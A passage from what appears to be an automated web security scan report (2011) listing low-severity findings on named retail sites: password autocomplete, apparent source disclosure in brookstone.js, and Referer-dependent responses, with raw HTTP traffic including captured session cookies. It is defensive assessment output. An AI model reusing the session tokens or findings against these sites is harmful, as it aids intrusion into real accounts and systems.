Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:44:18 GMT
Content-Length: 57400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<body bgcolor="#003366" leftmargin="0" topmargin="0">

       <form name="aspnetForm" method="post" action="dp.aspx?pgid=-22" id="aspnetForm">
<div>
...[SNIP]...
</span><input name="Skin$WB_POTID271$txtPassword" type="password" maxlength="16" id="Skin_WB_POTID271_txtPassword" onkeydown="javascript:Login(event)" style="font-size:XX-Small;height:17px;width:80px;" /></td>
...[SNIP]...
<td><input name="Skin$WB_POTIDneg4$txtPassword" type="password" maxlength="16" id="Skin_WB_POTIDneg4_txtPassword" onkeydown="javascript:Login(event)" style="width:110px;" /></td>
...[SNIP]...

14.42. https://www.petsmart.com/checkout/index.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.petsmart.com
Path:	/checkout/index.jsp

Issue detail

The page contains a form with the following action URL:

https://www.petsmart.com/coreg/index.jsp

The form contains the following password fields with autocomplete enabled:

newPassword
newPassword2

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:25 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--Preview TimeZon
...[SNIP]...
<tr>
                       <form name="newCustomer" onsubmit="valSignUp();return false;" action="/coreg/index.jsp" method="post">
                       <input type="hidden" name="step" value="signup">
...[SNIP]...
<br>
                           <input type="password" id="passwrd" size="18" name="newPassword" class="pagetext">
                           <br>
...[SNIP]...
<br>
                           <input type="password" id="confPasswrd" size="18" name="newPassword2" class="pagetext">


                                                                                                               <br>
...[SNIP]...

14.43. https://www.petsmart.com/checkout/index.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.petsmart.com
Path:	/checkout/index.jsp

Issue detail

The page contains a form with the following action URL:

https://www.petsmart.com/coreg/index.jsp

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:25 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--Preview TimeZon
...[SNIP]...
<tr>

                       <form name="returningCustomer" onsubmit="valLogin();return false;" action="/coreg/index.jsp" method="post">
                       <INPUT TYPE=hidden NAME="token" VALUE=""/>
...[SNIP]...
<br>
                       <input type="password" id="passwd" size="18" name="password" class="pagetext">
                       <br>
...[SNIP]...

14.44. https://www.redcrossstore.org/dp.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.redcrossstore.org
Path:	/dp.aspx

Issue detail

The page contains a form with the following action URL:

https://www.redcrossstore.org/dp.aspx?pgid=-22&ReturnTo=Cart

The form contains the following password field with autocomplete enabled:

Skin$WB_POTIDneg4$txtPassword

Request

GET /dp.aspx?pgid=-22&ReturnTo=Cart HTTP/1.1
Host: www.redcrossstore.org
Connection: keep-alive
Referer: https://www.redcrossstore.org/Shopper/ContactInfo.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.3.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:29:38 GMT
Content-Length: 38918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<body style="margin: 0px">

       <form name="aspnetForm" method="post" action="dp.aspx?pgid=-22&ReturnTo=Cart" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="Skin$WB_POTIDneg4$txtPassword" type="password" maxlength="16" id="Skin_WB_POTIDneg4_txtPassword" onkeydown="javascript:Login(event)" style="width:110px;" /></td>
...[SNIP]...

14.45. https://www.restorationhardware.com/my-account/register.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/register.jsp

Issue detail

The page contains a form with the following action URL:

https://www.restorationhardware.com/my-account/register.jsp?_DARGS=/my-account/register.jsp.my-account-register

The form contains the following password fields with autocomplete enabled:

/atg/userprofiling/ProfileFormHandler.value.password
/atg/userprofiling/ProfileFormHandler.value.confirmpassword

Request

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:32:23 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=c8ca4c79fc3e7bb28d932b5bb1dcf3292efa223a5124b4964dd101e1; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:32:23 GMT
Content-Length: 20125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...
</p>
                       <form action="register.jsp?_DARGS=/my-account/register.jsp.my-account-register" method="post"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
                           <input value="" maxlength="20" type="password" size="20" name="/atg/userprofiling/ProfileFormHandler.value.password" id="password"><input value=" " type="hidden" name="_D:/atg/userprofiling/ProfileFormHandler.value.password">
...[SNIP]...
</label>
                           <input value="" maxlength="20" type="password" size="20" name="/atg/userprofiling/ProfileFormHandler.value.confirmpassword" id="confirmpassword"><input value=" " type="hidden" name="_D:/atg/userprofiling/ProfileFormHandler.value.confirmpassword">
...[SNIP]...

14.46. https://www.restorationhardware.com/my-account/sign-in.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/sign-in.jsp

Issue detail

The page contains a form with the following action URL:

https://www.restorationhardware.com/my-account/sign-in.jsp?_DARGS=/my-account/sign-in.jsp.my-account-signin

The form contains the following password field with autocomplete enabled:

/atg/userprofiling/ProfileFormHandler.value.password

Request

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:55 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=ef27e626254569019b6a3249227030c92efa223a5124b4964dd08c1b; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:55 GMT
Content-Length: 19152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...
</p>
                           <form action="/my-account/sign-in.jsp?_DARGS=/my-account/sign-in.jsp.my-account-signin" method="post"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
                                       <input value="" maxlength="20" type="password" size="20" name="/atg/userprofiling/ProfileFormHandler.value.password"><input value=" " type="hidden" name="_D:/atg/userprofiling/ProfileFormHandler.value.password">
...[SNIP]...

15. Source code disclosure previous next
There are 2 instances of this issue:

http://www.brookstone.com/brookstone.js
https://www.brookstone.com/brookstone.js

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

15.1. http://www.brookstone.com/brookstone.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.brookstone.com
Path:	/brookstone.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /brookstone.js HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=259200
Expires: Thu, 19 May 2011 01:04:12 GMT
ETag: W/"141285-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:04:11 GMT
Age: 192
X-Cache: HIT from cache.brookstone.com
X-Cache-Lookup: HIT from cache.brookstone.com:3128
Connection: close

/********************************************************************************************************************
* UNOBTRUSIVE JAVASCRIPT: (PROTOTYPE)
...[SNIP]...
se{
submitEventBound = false;
// location.reload(true);
}
}
}

/* [Ticket #139714]
#C5ProductDetailEppFDT.jsp <%-- fix for ticket #139714 --%><script type="text/javascript">
...[SNIP]...

15.2. https://www.brookstone.com/brookstone.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://www.brookstone.com
Path:	/brookstone.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /brookstone.js HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Referer: https://www.brookstone.com/formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543312191%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=259200
Expires: Thu, 19 May 2011 09:53:18 GMT
ETag: W/"141285-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Date: Mon, 16 May 2011 09:53:18 GMT
Age: 1921
X-Cache: HIT from cache.brookstone.com
X-Cache-Lookup: HIT from cache.brookstone.com:3128
Connection: close

/********************************************************************************************************************
* UNOBTRUSIVE JAVASCRIPT: (PROTOTYPE)
...[SNIP]...
se{
submitEventBound = false;
// location.reload(true);
}
}
}

/* [Ticket #139714]
#C5ProductDetailEppFDT.jsp <%-- fix for ticket #139714 --%><script type="text/javascript">
...[SNIP]...

16. Referer-dependent response previous next
There are 7 instances of this issue:

http://action.media6degrees.com/orbserv/hbjs
http://ads.adbrite.com/adserver/vdi/684339
https://secure.bluenile.com/accounts/account-sign-in.html
http://web.aisle7.net/api/1.0/widgets/general/newswire-widget
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
https://www.guitarcenter.com/MyAccount/Login.aspx

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

16.1. http://action.media6degrees.com/orbserv/hbjs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://action.media6degrees.com
Path:	/orbserv/hbjs

Request 1

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f1400a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: orblb=2ll8nk2032gu10u0200z3o00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000nn0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z3o0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: JSESSIONID=E5833D4D3BA66471A3D9BEAA6132FFE0; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77
Date: Mon, 16 May 2011 01:55:01 GMT

(new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=1159169';

Request 2

GET /orbserv/hbjs?pixId=5204&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f1y00a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:32 GMT; Path=/
Set-Cookie: orblb=2ll8nk2032gu10u0200z4i00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:32 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:32 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000oh0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z4i0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:32 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:32 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77
Date: Mon, 16 May 2011 01:55:32 GMT

(new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=1159169';

16.2. http://ads.adbrite.com/adserver/vdi/684339 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/684339

Request 1

GET /adserver/vdi/684339?d=110 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=ChMKBjY4NDMzORi1nd_6EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@2@4dd08156@www.imiclk.com

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 16 May 2011 01:55:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChMKBjY4NDMzORipgJT7EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:55:15 GMT
Set-Cookie: ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlBwDuGWlaGxS6isUoJ%2BGnOHjXeIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 01:55:15 GMT
Set-Cookie: vsd=0@1@4dd08403@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 18-May-2011 01:55:15 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/684339?d=110 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=ChMKBjY4NDMzORi1nd_6EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@2@4dd08156@www.imiclk.com

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 16 May 2011 01:55:46 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChMKBjY4NDMzORjb9JX7EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:55:46 GMT
Set-Cookie: ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlBwDuGWlaGxS6isUoJ%2BGnOHjXeIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 01:55:46 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 16-May-2011 01:55:46 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

16.3. https://secure.bluenile.com/accounts/account-sign-in.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/accounts/account-sign-in.html

Request 1

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your Account Sign In - Blue Nile</title>

<link rel="stylesheet" type="text/css" media="screen, print" href="/N518116487/bundles/allpages.css" />
<link rel="stylesheet" type="text/css" media="screen, print" href="/N1374326862/bundles/cart.css" />
<link rel="stylesheet" type="text/css" media="print" href="/N688855944/css/cart_print.css" />
<link rel="stylesheet" type="text/css" media="screen, print" href="/984568475/css/footer.css" />

<script type="text/javascript" src="/926308692/bundles/core.js" ></script>
<script type="text/javascript" src="/N3371804/bundles/allpages.js" ></script>
<script type="text/javascript" src="/N522719515/bundles/ga.js" ></script>
<script type="text/javascript" src="/N889218490/bundles/forms.js" ></script>
<script type="text/javascript" src="/N1991330425/js/navigation_flyouts_menu.js" ></script>
<script type="text/javascript" src="/N995712186/bundles/accounts.js" ></script>
